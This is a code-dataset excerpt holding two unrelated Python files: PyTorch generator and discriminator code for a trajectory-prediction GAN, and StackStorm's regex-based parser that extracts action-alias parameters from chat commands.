self.mlp_decoder_context = make_mlp(
mlp_decoder_context_dims,
activation=activation,
batch_norm=batch_norm,
dropout=dropout
)
def add_noise(self, _input, seq_start_end, user_noise=None):
"""
Inputs:
- _input: Tensor of shape (_, decoder_h_dim - noise_first_dim)
- seq_start_end: A list of tuples which delimit sequences within batch.
- user_noise: Generally used for inference when you want to see
relation between different types of noise and outputs.
Outputs:
- decoder_h: Tensor of shape (_, decoder_h_dim)
"""
if not self.noise_dim:
return _input
if self.noise_mix_type == 'global':
noise_shape = (seq_start_end.size(0), ) + self.noise_dim
else:
noise_shape = (_input.size(0), ) + self.noise_dim
if user_noise is not None:
z_decoder = user_noise
else:
z_decoder = get_noise(noise_shape, self.noise_type)
if self.noise_mix_type == 'global':
_list = []
for idx, (start, end) in enumerate(seq_start_end):
start = start.item()
end = end.item()
_vec = z_decoder[idx].view(1, -1)
_to_cat = _vec.repeat(end - start, 1)
_list.append(torch.cat([_input[start:end], _to_cat], dim=1))
decoder_h = torch.cat(_list, dim=0)
return decoder_h
decoder_h = torch.cat([_input, z_decoder], dim=1)
return decoder_h
def mlp_decoder_needed(self):
if (
self.noise_dim or self.pooling_type or
self.encoder_h_dim != self.decoder_h_dim
):
return True
else:
return False
def forward(self, obs_traj, obs_traj_rel, seq_start_end, user_noise=None):
"""
Inputs:
- obs_traj: Tensor of shape (obs_len, batch, 2)
- obs_traj_rel: Tensor of shape (obs_len, batch, 2)
- seq_start_end: A list of tuples which delimit sequences within batch.
- user_noise: Generally used for inference when you want to see
relation between different types of noise and outputs.
Output:
- pred_traj_rel: Tensor of shape (self.pred_len, batch, 2)
"""
batch = obs_traj_rel.size(1)
obs_len = obs_traj_rel.size(0)
# Encode seq
final_encoder_h = self.encoder(obs_traj_rel)
# Pool States
# if self.pooling_type:
# end_pos = obs_traj[-1, :, :]
# pool_h = self.pool_net(final_encoder_h, seq_start_end, end_pos)
# # Construct input hidden states for decoder
# mlp_decoder_context_input = torch.cat(
# [final_encoder_h.view(-1, self.encoder_h_dim), pool_h], dim=1)
# else:
# mlp_decoder_context_input = final_encoder_h.view(
# -1, self.encoder_h_dim)
mlp_decoder_context_input = final_encoder_h.view(-1, self.encoder_h_dim)
# Add Noise
# if self.mlp_decoder_needed():
noise_input = self.mlp_decoder_context(mlp_decoder_context_input)
# else:
# noise_input = mlp_decoder_context_input
noise_output = self.add_noise(
noise_input, seq_start_end, user_noise=user_noise)
# decoder_h = torch.unsqueeze(decoder_h, 0)
# decoder_c = torch.zeros(
# self.num_layers, batch, self.decoder_h_dim
# ).cuda()
# state_tuple = (decoder_h, decoder_c)
last_pos = obs_traj[-1]
last_pos_rel = obs_traj_rel[-1]
# Predict Trajectory
decoder_out = self.decoder(
last_pos,
last_pos_rel,
noise_output,
seq_start_end,
)
pred_traj_fake_rel = decoder_out.permute(1, 0, 2)
return pred_traj_fake_rel
class TrajectoryDiscriminator(nn.Module):
def __init__(
self, obs_len, pred_len, embedding_dim=64, h_dim=64, mlp_dim=1024,
num_layers=1, activation='relu', batch_norm=True, dropout=0.0,
d_type='local'
):
super(TrajectoryDiscriminator, self).__init__()
self.obs_len = obs_len
self.pred_len = pred_len
self.seq_len = obs_len + pred_len
self.mlp_dim = mlp_dim
self.h_dim = h_dim
self.d_type = d_type
self.encoder = Encoder(
embedding_dim=embedding_dim,
h_dim=h_dim,
mlp_dim=mlp_dim,
num_layers=num_layers,
dropout=dropout
)
# real_classifier_dims = [h_dim, mlp_dim, 1]
# self.real_classifier = make_mlp(
# real_classifier_dims,
# activation=activation,
# batch_norm=batch_norm,
# dropout=dropout
# )
# if d_type == 'global':
# mlp_pool_dims = [h_dim + embedding_dim, mlp_dim, h_dim]
# self.pool_net = PoolHiddenNet(
# embedding_dim=embedding_dim,
# h_dim=h_dim,
# mlp_dim=mlp_pool_dims,
# bottleneck_dim=h_dim,
# activation=activation,
# batch_norm=batch_norm
# )
real_classifier_dims = [(obs_len + pred_len) * 2, 16, 8, 1]
self.real_classifier = make_mlp(
real_classifier_dims,
activation=activation,
batch_norm=batch_norm,
dropout=dropout
)
# def forward(self, traj, traj_rel, seq_start_end=None):
# """
# Inputs:
# - traj: Tensor of shape (obs_len + pred_len, batch, 2)
# - traj_rel: Tensor of shape (obs_len + pred_len, batch, 2)
# - seq_start_end: A list of tuples which delimit sequences within batch
# Output:
# - scores: Tensor of shape (batch,) with real/fake scores
# """
# final_h = self.encoder(traj_rel)
# # Note: In case of 'global' option we are using start_pos as opposed to
# # end_pos. The intution being that hidden state has the whole
# # trajectory and relative postion at the start when combined with
# # trajectory information should help in discriminative behavior.
# if self.d_type == 'local':
# classifier_input = final_h.squeeze()
# else:
# classifier_input = self.pool_net(
# final_h.squeeze(), seq_start_end, traj[0]
# )
# scores = self.real_classifier(classifier_input)
# return scores
def forward(self, traj, traj_rel, seq_start_end=None):
"""
Inputs:
- traj: Tensor of shape (obs_len + pred_len, batch, 2)
- traj_rel: Tensor of shape (obs_len + pred_len, batch, 2)
- seq_start_end: A list of tuples which delimit sequences within batch
Output:
- scores: Tensor of shape (batch,) with real/fake scores
"""
batch = traj_rel.shape[1]
traj_rel = traj_rel.permute(1, 0, 2)
classifier_input = traj_rel.contiguous().view(batch, -1)
scores = self.real_classifier(classifier_input)
return scores |
py | 1a4bc3e41ef3abb343ff1b935afe3914ec2b0c83 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from st2common.exceptions.content import ParseException
__all__ = [
'ActionAliasFormatParser',
'extract_parameters_for_action_alias_db',
'extract_parameters',
]
class ActionAliasFormatParser(object):
def __init__(self, alias_format=None, param_stream=None):
self._format = alias_format or ''
self._param_stream = param_stream or ''
def get_extracted_param_value(self):
"""
Match command against the format string and extract paramters from the command string.
:rtype: ``dict``
"""
result = {}
param_stream = self._param_stream
# As there's a lot of questions about using regular expressions,
# I'll try to be thorough when documenting this code.
# I'll split the whole convoluted regex into snippets to make it
# a bit more readable (hopefully).
snippets = dict()
# Formats for keys and values: key is a non-spaced string,
# value is anything in quotes or curly braces, or a single word.
snippets['key'] = r'\s*(\S+?)\s*'
snippets['value'] = r'""|\'\'|"(.+?)"|\'(.+?)\'|({.+?})|(\S+)'
# Extended value: also matches unquoted text (caution).
snippets['ext_value'] = r'""|\'\'|"(.+?)"|\'(.+?)\'|({.+?})|(.+?)'
# Key-value pair:
snippets['pairs'] = r'(?:^|\s+){key}=({value})'.format(**snippets)
# End of string: multiple space-separated key-value pairs:
snippets['ending'] = r'.*?(({pairs}\s*)*)$'.format(**snippets)
# Default value in optional parameters:
snippets['default'] = r'\s*=\s*(?:{ext_value})\s*'.format(**snippets)
# Optional parameter (has a default value):
snippets['optional'] = '{{' + snippets['key'] + snippets['default'] + '}}'
# Required parameter (no default value):
snippets['required'] = '{{' + snippets['key'] + '}}'
# 1. Matching the arbitrary key-value pairs at the end of the command
# to support extra parameters (not specified in the format string),
# and cutting them from the command string afterwards.
ending_pairs = re.match(snippets['ending'], param_stream, re.DOTALL)
has_ending_pairs = ending_pairs and ending_pairs.group(1)
if has_ending_pairs:
kv_pairs = re.findall(snippets['pairs'], ending_pairs.group(1), re.DOTALL)
param_stream = param_stream.replace(ending_pairs.group(1), '')
param_stream = " %s " % (param_stream)
# 2. Matching optional parameters (with default values).
optional = re.findall(snippets['optional'], self._format, re.DOTALL)
# Transforming our format string into a regular expression,
# substituting {{ ... }} with regex named groups, so that param_stream
# matched against this expression yields a dict of params with values.
param_match = r'\1["\']?(?P<\2>(?:(?<=\').+?(?=\')|(?<=").+?(?=")|{.+?}|.+?))["\']?'
reg = re.sub(r'(\s*)' + snippets['optional'], r'(?:' + param_match + r')?', self._format)
reg = re.sub(r'(\s*)' + snippets['required'], param_match, reg)
reg = '^\s*' + reg + r'\s*$'
# 3. Matching the command against our regex to get the param values
matched_stream = re.match(reg, param_stream, re.DOTALL)
if not matched_stream:
# If no match is found we throw since this indicates provided user string (command)
# didn't match the provided format string
raise ParseException('Command "%s" doesn\'t match format string "%s"' %
(self._param_stream, self._format))
# Compiling results from the steps 1-3.
if matched_stream:
result = matched_stream.groupdict()
for param in optional:
matched_value = result[param[0]] if matched_stream else None
matched_result = matched_value or ''.join(param[1:])
if matched_result is not None:
result[param[0]] = matched_result
if has_ending_pairs:
for pair in kv_pairs:
result[pair[0]] = ''.join(pair[2:])
if self._format and not (self._param_stream.strip() or any(result.values())):
raise ParseException('No value supplied and no default value found.')
return result
def extract_parameters_for_action_alias_db(action_alias_db, format_str, param_stream):
"""
Extract parameters from the user input based on the provided format string.
Note: This function makes sure that the provided format string is indeed available in the
action_alias_db.formats.
"""
formats = []
formats = action_alias_db.get_format_strings()
if format_str not in formats:
raise ValueError('Format string "%s" is not available on the alias "%s"' %
(format_str, action_alias_db.name))
result = extract_parameters(format_str=format_str, param_stream=param_stream)
return result
def extract_parameters(format_str, param_stream):
parser = ActionAliasFormatParser(alias_format=format_str, param_stream=param_stream)
return parser.get_extracted_param_value()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.